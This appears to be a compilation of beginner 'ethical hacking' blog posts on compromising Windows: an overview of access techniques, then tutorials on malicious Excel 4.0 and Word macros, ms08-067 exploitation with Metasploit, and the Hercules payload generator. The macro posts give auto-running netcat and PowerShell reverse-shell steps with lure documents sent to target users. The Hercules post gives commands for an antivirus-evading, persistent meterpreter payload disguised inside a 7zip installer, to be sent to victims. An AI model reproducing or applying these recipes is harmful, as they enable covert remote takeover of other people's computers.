Posted on

Windows hacking guide for beginners

Hello, aspiring ethical hackers. This article is a beginners guide for Windows hacking. It comes under gaining access, third of the 5 phases of ethical hacking.

What is Windows hacking?

Although Windows hacking can be generalized to any hacking performed on the Windows operating system, gaining initial access to the Windows systems is known as Windows hacking.

Why is it important?

According to StatCounter Global Stats, over 72.52% of people worldwide use Windows as their Desktop. That is the reason why Windows hacking is one of the most important topics of ethical hacking.

Windows hacking techniques

There are multiple ways by which hackers can gain initial access on Windows systems. They are,

  1. Vulnerabilities in the operating system or kernel
  2. Application vulnerabilities.
  3. Payloads & malicious software.
  4. Password attacks.
  5. Misconfigured services.
  6. Social- engineering

1. Vulnerabilities in the operating system or kernel:

An operating system or kernel is the core of any Windows system. Enterprises around the world use Windows operating system for various purposes. As already mentioned, according to StatCounter Global Stats, over 72.52% of people worldwide use Windows as their Desktop. So, any vulnerability exposed in the operating system can be exploited by hackers to gain initial access.

For example, in 2008, ms08-067 vulnerability was exploited by Conficker worm to infect millions of devices around the world. Similarly, another vulnerability in Windows software, Eternal Blue (ms17-010) was exploited by NSA for intelligence gathering and counter terrorism missions. When this vulnerability got leaked, it was exploited by the WannaCry ransomware attack that infected 2,30,000 Windows PCs across 150 countries.

2. Application vulnerabilities:

A lot of applications or programs are installed in Windows operating system to perform various functions. Any vulnerabilities in these installed programs can be exploited successfully to hack the Windows system. For example, macros feature in Microsoft office has been exploited for a long time by hacker groups around the world to gain initial access until this was banned officially by Microsoft. Macros is a feature in Microsoft office to automate procedures.

In 2022, Chinese hacker group Cicada, exploited VLC Media Player, a popular and open source multimedia player to hack Windows systems and installed malware for espionage purpose. They did this by embedding a malicious file alongside the VLC Media Player’s export functions.

3. Malicious payloads:

Hackers just don’t use vulnerabilities to gain access. They also use malicious payloads like malware and virus to hack Windows systems. These payloads can be spread by using dive-by downloads or phishing. For example, Zeus trojan that specializes stealing banking information is spread through same techniques mentioned above. Examples of some payload generators are msfvenom, Veil, MSFPC, Cypher etc.

4. Password attacks:

Some Enterprise Windows systems are enabled with remote access so that employees can connect to them remotely for the purpose of their work. The protocols enabling remote access like SSH, FTP, Telnet and RDP etc. Cracking the credentials of these services give hackers a way to gain access to the servers and subsequently to the Windows system. Learn more about password cracking.

As recently as November 2023, a Russian Hacker group (Midnight Blizzard) used password spraying attack, a type of password attack to compromise some corporate accounts of Microsoft users.

5. Misconfigured services:

Sometimes, services being used in the target Windows network can be misconfigured either by mistake or on purpose. Hackers can exploit these misconfigurations to hack the Windows system. In October 2022, Microsoft company exposed one endpoint to public internet without authentication. This led to data leak of 65,000 customers in 111 countries. The total size of the stolen data was 2.4 terabytes.

7. The human factor:

No matter how strong the firewall on the network is or how secure the Windows devices are in a network, if the employees of the organization are not well trained, they can eventually give hackers access into the network or Windows devices. Social-engineering is often very underrated as a factor that allows hackers to hack Windows systems. Learn more about social engineering.

Posted on

Excel Macros for beginners

Hello aspiring ethical hackers. In our previous article, you have learnt what a Macro is and how to create a malicious VBA macro. In this article, you will learn about Excel 4.0 Macros and how to create one. Excel 4.0 Macros or XLM were introduced by Microsoft in 1992 when Excel 4.0 was launched as a default macro language and they serve the same functions as VBA macros in Word.  

As Excel 4.0 Macros are used for legitimate purposes, they can’t just be disabled by many. Further increasing the effectiveness of these macros, there is not yet a good detection method to detect malicious XL4 macros. Apart from this, they are very simple create but also very powerful just like Visual Basic Application (VBA) Macros.

 Now let’s see how to create an Excel 4.0 Macro. On a Windows system, we open Excel in Microsoft Office or the Office Suite. We are doing this on Microsoft Office 2007. You should see an Excel Workbook opened as shown below.

Right click on “Sheet 1” and select the “Insert” option as shown below.

In the newly opened window, select MS Excel 4.0 Macro and click on “OK”.

excel 4.0 macros

This will change the name of “Sheet 1” to “Macro 1” as shown below.

Save the file with the name you like. We have named it “evil_macro” for easy identification. While saving it, save it as a Macro Enabled Excel Workbook.

Once the file is saved, it’s time to create the macro. In the first column, which is named A1, we insert the command given below.

=EXEC(“cmd.exe”)

You may not realize, but you have already created your first XL4 macro. In the second column, i.e A2, insert another command =HALT(). This is to ensure that the macro you created does not face an error while running. It’s time to test your macro. Right Click on the first column, and click on “Run” as shown below.

Most probably, this will open a new window as shown below. Click on “Run”.

Doing this opens a Windows CMD window as shown below.

Voila, we successfully created a Excel 4.0 Macro and even executed it. If you have noticed it, we opened a Windows CMD by inserting a simple code. Now, let’s make a few changes to the “evil_macro” file. Move the =HALT() command to A3 cell and enter command given below in cell A2. Save the file.

=ALERT(“You have been hacked”)

Right click on Cell A1 and select “Run” again just like you did before.

Now, we can see that apart from Windows CMD window being opened, another window popped up with the message “You have been hacked”. We have just performed two operations with macros in one file. Not just cmd.exe, we can open other programs like Notepad and Calc.exe using the “=exec” function.

Now, let’s try something a bit advanced like spawning a reverse shell now. Download the Netcat Windows executable. Open Notepad and insert the following command into it.

<Path to Netcat Windows executable> <target IP> <target port> -e cmd.exe.

On our system, this command looks like this.                    

C:\Users\nspadm\Desktop\nc.exe 192.168.36.189 4444 -e cmd.exe

The -e option specifies which command to execute after netcat makes a successful connection. Now, save this file as a CMD file.  This can be done by saving the file in double quotes. For example, “shell.cmd” and keeping the file type as all files.

Now, in your evil_macro file, change the =EXEC function to execute the shell.cmd file you just now created as shown below.

Save the file. Before executing the macro, start a Netcat listener on the listener IP address you specified.

Now, when you execute the macro, you should get a successful shell as shown below.

This is all fine but nobody will open an Excel file and execute some suspicious looking code in it. We need the code to run automatically as soon as the user opens the Excel file. To do this, Click on A1 cell of your “evil_macro” file and rename it to “Auto_Open” as shown below.

Save the changes and close the file. Start the netcat listener again. Now, just open the evil_macro file and you should see the successful spawning of reverse shell again. That’s all about Excel 4.0 Macros for now.

Posted on

Malicious Macro’s : What, Why and How

Hello aspiring Ethical Hackers. In this article, you will learn about Malicious Macros also known as Macro Malware or Macro Virus. In computer science, a Macro is a set of commands grouped together as a single command. This is used to run some tasks automatically. In Word, Macros are used to automate frequently used tasks.
           Hackers have been using Macros since a long time as a means to gain initial access to target networks by injecting malicious code into macros. These macros all called malicious macros or macro malware or macro virus. Let’s see how to create a malicious macro.
             For this we will be using a tool that is here. In Kali, clone this tool as shown below.

Navigate into the cloned directory.

Inside that directory, there will be two python scripts: “newpayloadgeneration.py” and ‘payload.py’. Run the script ‘newpayloadgeneration.py’ giving the Attacker IP and port as options. This script generates a Powershell script for reverse shell. Obviously, the IP and port should be of that system on which the listener is running to receive the reverse shell.

Copy the generated encoded string. Open the file ‘payload.py’ and paste the encoded string in the highlighted place.

Once pasted, save the file ‘payload.py’ to preserve the changes. Now, execute the ‘payload.py’ script.

The code for malicious macro is ready. Now let’s create a Macro document. For this tutorial, we are using MS Office 2007 to create it. Open a new Word document, go to View tab and click on Macros (as highlighted below).

malicious macro

Click on “view macros”.

In the new window that opens, click on “create” and give any name you prefer to that macro (We named it test, obviously).

Now, we create the code for macro. It starts with “Sub AutoOpen(). “Sub” stands for Subroutine in macro. It is a small program within the Visual Basic editor. Setting AutoOpen() executes the macro automatically whenever the document is opened. In the subroutine test(), we paste the malicious code we created earlier as shown below.

Then we save this file. This file is sent to the target users. In Real World hacking attacks, since this is the lure document, some bells and whistles are added to convince users to open the document and enable macros. We start the Netcat listener on the attacker machine. When the target user opens this file, we get a security warning saying that macros have been disabled. This is a security feature by Microsoft to protect user from malicious macros. Let’s enable macros for this tutorial. click on options and enable macros as shown below.

As soon as we do this, a Powershell window opens (remember that a we created a Powershell reverse shell)

and we get a incoming reverse shell on our listener as shown below.

This is how malicious macros work to give attackers initial access.

Posted on

ms08-067 exploitation to hack Windows XP

Hello aspiring ethical hackers. In this article, we will see how to exploit ms08-067 vulnerability to hack Windows XP. As our readers may already know by now, ms08-067 is a vulnerability in Windows 2000, Windows Server 2003 and Windows XP.  It is a critical vulnerability that allows remote code execution on the target Windows system by sending a specially crafted RPC request to it.

This vulnerability doesn’t require any authentication or even user interaction on the target side. That’s the reason why it is ubiquitous in any ethical hacking course. We have exploited this vulnerability recently in our February 2021 Issue. But that was done using without Metasploit.

In this article, we will do this with Metasploit. For this, we have chosen our target as Windows XP SP2 and our Attacker system as Kali Linux. Most of the Antivirus ended their support to Windows XP SP2 (Windows XP SP3 is the minimum supported version. Even Real world systems running Windows XP SP2 are running without Anti Virus.)

So Nmap scan revealed a Windows target as shown below.

Start Metasploit and load the ms08_067 module.

Set all the required options and use check command to see if the target is indeed vulnerable.

The target is indeed vulnerable. Now, execute the module as shown below.

ms08-067

As readers can see, we successfully got a meterpreter session with SYSTEM privileges.

Posted on 19 Comments

Beginners guide to hacking Windows

Hello aspiring Ethical Hackers. Today we will learn about a payload generator that I used in hacking  Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP,  it can only be done by sending payloads in portable executables. The biggest challenge in sending these  malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules  is a special payload generator for hacking Windows that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone https://github.com/EgeBalci/Hercules to clone Hercules into Kali Linux.

The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.

Now type command go build HERCULES.go  to build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.

Now its time to create our payload. Type command,

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic 

Let me explain this command.

192.168.25.146 – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.

hacking windows 10

Our payload’s name is payload.exe. Type “ls”  as shown below. Now send this file to our victim using your creativity.

On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.

Type command help to see all the commands we can execute on our target system.

For example, type command systeminfo to see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.

So let’s add a little bit reality to our payload this time. Now we will add two things : persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe 

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.

So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).

When the user clicks on “yes”, the installation will progress normally on the victim’s system.

And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back.  Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.

That was all about hacking Windows 10 with Hercules Payload Generator.